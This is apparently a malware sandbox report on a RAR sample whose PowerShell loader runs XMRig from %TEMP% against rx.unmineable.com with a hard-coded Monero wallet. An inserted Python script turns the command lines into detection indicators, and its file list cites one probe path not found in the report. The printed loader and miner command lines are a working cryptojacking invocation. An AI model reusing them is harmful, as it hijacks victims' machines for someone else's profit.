Analysis Overview
SHA256
08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Threat Level: Known bad
The file main2.rar was found to be: Known bad.
Malicious Activity Summary
XMRig Miner payload
xmrig
Blocklisted process makes network request
Executes dropped EXE
Command and Scripting Interpreter: PowerShell
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious behavior: LoadsDriver
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-27 00:27
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:15
Platform
win10-20240404-en
Max time kernel
1791s
Max time network
1761s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2908 wrote to memory of 4796 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2908 wrote to memory of 4796 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kvhaacsx.qmr.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:16
Platform
win10v2004-20240508-en
Max time kernel
1791s
Max time network
1770s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3988 wrote to memory of 3544 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3988 wrote to memory of 3544 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.15.104.51.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xqq3pg4h.nh5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:17
Platform
win11-20240426-en
Max time kernel
1797s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3984 wrote to memory of 2812 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3984 wrote to memory of 2812 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mtlhczlp.4ab.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:20
Platform
win10v2004-20240426-en
Max time kernel
1788s
Max time network
1797s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2432 wrote to memory of 2372 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2432 wrote to memory of 2372 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
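The two command lines above are the whole story of this sample: powershell.exe with `-ExecutionPolicy bypass` runs a `.ps1` out of `%TEMP%`, and the child it spawns is a stock XMRig 6.21.3 pointed at rx.unmineable.com with a hard-coded `XMR:<address>.<worker>` login. The following Python is an added example, not code from the Triage report or from XMRig: it tokenises those command lines the way a detection pipeline would see them in a process-creation event, extracts the pool, wallet and worker indicators, applies three behaviour checks (execution-policy bypass on a script in %TEMP%, a dropped executable under %TEMP% launched by powershell.exe, and a miner-style pool argument), and classifies the dropped files listed further down. The event records and file entries are constructed from this page; the parent PID of powershell.exe (1000) is an assumption the report does not show.

```python
"""Triage of this report's process tree: parse the loader and XMRig command
lines, extract pool/wallet/worker IOCs, score events for miner behaviour.
Added example, not part of the Triage report or of XMRig."""
import hashlib
import re
from urllib.parse import urlsplit

# Constructed process-creation events (Sysmon event 1 shape) built from the
# report's Processes section.  PPID 1000 for powershell.exe is assumed.
EVENTS = [
    {"pid": 2432, "ppid": 1000,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"'},
    {"pid": 2372, "ppid": 2432,
     "image": r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x'},
]
# Constructed from the report's Files section (probe file from behavioral1).
FILES = [
    {"path": r"C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kfkhxv4l.qnq.ps1",
     "md5": "c4ca4238a0b923820dcc509a6f75849b"},
    {"path": r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe",
     "md5": "205ad9eb6acd6f58752899669b69fe74"},
]

TOKEN_RE = re.compile(r'"[^"]*"|\S+')              # quoted paths stay one token
USER_TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
MONERO_ADDR_RE = re.compile(r"^4[1-9A-HJ-NP-Za-km-z]{94}$")  # standard address
POLICY_PROBE_RE = re.compile(r"^__PSScriptPolicyTest_[a-z0-9]+\.[a-z0-9]+\.ps1$", re.I)
EXEC_POLICY_FLAGS = {"-executionpolicy", "-exec", "-ep"}  # prefixes PowerShell accepts
XMRIG_OPTS = {"-a": "algo", "--algo": "algo", "-o": "url", "--url": "url",
              "-u": "user", "--user": "user", "-p": "pass", "--pass": "pass"}


def tokenize(cmdline):
    return [t.strip('"') for t in TOKEN_RE.findall(cmdline)]


def parse_xmrig(cmdline):
    """Pool and wallet IOCs from an XMRig-style command line; None when the
    line carries no -o/--url pool argument."""
    toks = tokenize(cmdline)
    opts = {}
    for i, tok in enumerate(toks):
        name, eq, inline = tok.partition("=")
        key = XMRIG_OPTS.get(name)
        if key is None:
            continue
        if eq:
            opts[key] = inline
        elif i + 1 < len(toks):
            opts[key] = toks[i + 1]
    if "url" not in opts:
        return None
    url = opts["url"]
    if "://" not in url:              # XMRig treats a bare host:port as stratum+tcp
        url = "stratum+tcp://" + url
    u = urlsplit(url)
    user = opts.get("user", "")
    # unMineable logins are COIN:address.worker; plain pools use address[.worker]
    coin, _, rest = user.partition(":") if ":" in user else ("", "", user)
    wallet, _, worker = rest.partition(".")
    return {"algo": opts.get("algo", ""), "pool_host": u.hostname,
            "pool_port": u.port, "tls": u.scheme in ("stratum+ssl", "stratum+tls"),
            "coin": coin, "wallet": wallet, "worker": worker,
            "wallet_is_monero": bool(MONERO_ADDR_RE.match(wallet))}


def score_event(ev, by_pid):
    """Three behaviour checks for one event; returns the list of hits."""
    hits = []
    toks = [t.lower() for t in tokenize(ev["cmdline"])]
    if ev["image"].lower().endswith("powershell.exe"):
        for i, tok in enumerate(toks[:-1]):
            if tok in EXEC_POLICY_FLAGS and toks[i + 1] in ("bypass", "unrestricted"):
                if "-file" in toks and USER_TEMP_RE.search(ev["cmdline"]):
                    hits.append("powershell: ExecutionPolicy bypass on a script in %TEMP%")
                break
    parent = by_pid.get(ev["ppid"])
    if (parent and parent["image"].lower().endswith("powershell.exe")
            and USER_TEMP_RE.search(ev["image"])):
        hits.append("dropped executable under %TEMP% launched by powershell.exe")
    miner = parse_xmrig(ev["cmdline"])
    if miner:
        hits.append("miner: %s -> %s:%s tls=%s" % (
            miner["algo"], miner["pool_host"], miner["pool_port"], miner["tls"]))
    return hits


def triage(events):
    by_pid = {e["pid"]: e for e in events}
    return {e["pid"]: score_event(e, by_pid) for e in events}


def classify_file(entry):
    name = entry["path"].rsplit("\\", 1)[-1]
    if POLICY_PROBE_RE.match(name):
        # PowerShell writes this probe itself at startup to test AppLocker/WDAC
        # lockdown mode; it is not something the sample dropped.
        return "benign: PowerShell script-policy probe"
    if USER_TEMP_RE.search(entry["path"]) and name.lower().endswith(".exe"):
        return "suspicious: executable dropped under %TEMP%"
    return "unclassified"


def probe_is_one_byte(entry):
    """True when a probe entry's recorded MD5 is that of the one-byte string "1"."""
    return entry["md5"] == hashlib.md5(b"1").hexdigest()


if __name__ == "__main__":
    for pid, hits in triage(EVENTS).items():
        print(pid, hits)
    print(parse_xmrig(EVENTS[1]["cmdline"]))
    for f in FILES:
        print(f["path"], "->", classify_file(f), "| md5('1'):", probe_is_one_byte(f))
```

Two caveats worth carrying into a hunt. First, the `SeLockMemoryPrivilege` adjustments under "Suspicious use of AdjustPrivilegeToken" are XMRig asking for large pages (RandomX performance); a process under `%TEMP%` requesting that privilege is a much better signal than the PowerShell `SeDebugPrivilege` line, which ordinary scripts trigger too. Second, the pool session is `stratum+ssl` on TCP/443, so at flow level it looks like HTTPS; the DNS query for rx.unmineable.com and the preceding github.com / objects.githubusercontent.com fetch (consistent with the loader pulling the xmrig-6.21.3 release) are the network indicators you can actually match on. The `__PSScriptPolicyTest_*.ps1` entries are PowerShell's own startup artefact, and the behavioral1 copy's MD5/SHA-1/SHA-256 are those of the single byte "1", so they should not go into an IOC list; the dropped `xmrig.exe` hash (2025f4fe…) and the wallet/worker string are shared by every detonation on this page and are the values to pivot on.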
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.173.189.20.in-addr.arpa | udp |
Files
memory/2432-0-0x00007FFFE0893000-0x00007FFFE0895000-memory.dmp
memory/2432-10-0x0000012BF8CE0000-0x0000012BF8D02000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g5gv4ue5.x05.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2432-11-0x00007FFFE0890000-0x00007FFFE1351000-memory.dmp
memory/2432-12-0x00007FFFE0890000-0x00007FFFE1351000-memory.dmp
memory/2432-14-0x00007FFFE0890000-0x00007FFFE1351000-memory.dmp
memory/2432-15-0x0000012BF9AB0000-0x0000012BF9AC2000-memory.dmp
memory/2432-16-0x0000012BF8E70000-0x0000012BF8E7A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2372-47-0x000001965A0E0000-0x000001965A100000-memory.dmp
memory/2372-48-0x000001965A130000-0x000001965A150000-memory.dmp
memory/2372-49-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-52-0x000001965A170000-0x000001965A190000-memory.dmp
memory/2372-51-0x000001965A150000-0x000001965A170000-memory.dmp
memory/2372-50-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2432-53-0x00007FFFE0893000-0x00007FFFE0895000-memory.dmp
memory/2432-54-0x00007FFFE0890000-0x00007FFFE1351000-memory.dmp
memory/2372-55-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2432-56-0x00007FFFE0890000-0x00007FFFE1351000-memory.dmp
memory/2372-57-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-59-0x000001965A170000-0x000001965A190000-memory.dmp
memory/2372-58-0x000001965A150000-0x000001965A170000-memory.dmp
memory/2372-60-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-61-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-62-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-63-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-64-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-65-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-66-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-67-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-68-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-69-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-70-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-71-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-72-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-73-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-74-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-75-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-76-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-77-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-78-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-79-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-80-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-81-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-82-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-83-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-84-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-85-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-86-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-87-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-88-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-89-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-90-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
